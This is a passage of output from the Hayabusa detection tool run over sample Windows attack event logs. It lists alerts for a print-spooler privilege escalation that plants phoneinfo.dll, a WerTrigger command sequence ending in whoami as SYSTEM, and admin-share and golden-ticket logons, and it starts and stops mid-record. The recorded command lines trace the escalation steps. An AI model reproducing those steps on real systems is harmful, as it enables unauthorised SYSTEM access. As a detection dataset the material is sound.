747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.551 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.562 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRVUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.562 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.562 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.562 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.562 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.INI | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.563 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.563 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.563 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.563 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.602 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDNAMES.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.602 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDDTYPE.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.603 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHEM.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.603 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHMX.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.622 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\Old\1 | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.949 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\blah\blah\phoneinfo.dll | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.949 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Suspicious Print Port | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports\c:\blah\blah\phoneinfo.dll: (Empty) | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:28.509 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SPL | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2532 | PGUID: 747F3D96-E8D1-5F33-0000-001007B63A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:28.509 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:28.521 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:05:19.719 +00:00,MSEDGEWIN10,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 4.23,rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:05:20.029 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1740 | PGUID: 747F3D96-E90A-5F33-0000-0010863C0100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:05:20.378 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3320 | PGUID: 747F3D96-E90C-5F33-0000-0010CB420200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:05:20.378 +00:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:05:36.555 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x41c24 | PID: 5128 | PGUID: 747F3D96-E920-5F33-0000-001043920A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:05:38.260 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | LID: 0x3e7 | PID: 6952 | PGUID: 747F3D96-E922-5F33-0000-00107A2B0B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:05:38.260 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:05:45.570 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\Explorer.EXE | Tgt Process: C:\Program Files (x86)\FileZilla Server\FileZilla Server Interface.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 5144 | Src PGUID: 747F3D96-E914-5F33-0000-001009990500 | Tgt PID: 7480 | Tgt PGUID: 747F3D96-E928-5F33-0000-0010B8330D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:00.737 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7836 | PGUID: 747F3D96-E938-5F33-0000-00101CA50E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:00.737 +00:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation_sysmon/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:00.737 +00:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete File,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:00.737 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:01.637 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7852 | PGUID: 747F3D96-E939-5F33-0000-0010ACAB0E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:01.637 +00:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation_sysmon/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:02.552 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7868 | PGUID: 747F3D96-E93A-5F33-0000-001014B30E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:02.552 +00:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation_sysmon/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:02.552 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:03.487 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7888 | PGUID: 747F3D96-E93B-5F33-0000-0010C1B40E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:03.487 +00:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation_sysmon/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:03.487 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:04.075 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wermgr.exe -upload | LID: 0x3e7 | PID: 8032 | PGUID: 747F3D96-E93C-5F33-0000-0010A6F00E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:08.143 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 7460 | PGUID: 747F3D96-E940-5F33-0000-001039310F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:08.143 +00:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:08.143 +00:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:08.143 +00:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-20 15:35:28.503 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack-admu-test1 | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 0x2275e86d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-20 15:36:32.382 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276a30d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-20 15:36:32.391 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276a30d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-20 15:37:06.186 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276ac17,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-20 15:37:14.331 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276ac17,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-20 15:37:17.039 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276b0af,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-20 15:37:35.319 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276b0af,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-20 15:37:35.773 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: JUMP01$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276b890,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-20 15:38:23.185 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: not_existing_user | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 0x2276d109,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx +2020-08-20 15:39:15.820 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276ac17,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx +2020-08-20 15:41:58.884 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: not_existing_user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b90e2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-20 15:42:54.177 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a72,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-20 15:42:54.177 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-20 15:42:54.193 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9aa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-20 15:42:54.193 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9ab2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-20 15:42:55.188 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9b27,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-20 15:43:04.967 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9e04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-20 15:43:36.582 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba401,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-20 15:43:36.582 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba414,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-20 15:43:36.582 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba427,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-25 09:58:51.434 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\{17A6A947-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db | Process: C:\Windows\system32\LogonUI.exe | PID: 8500 | PGUID: 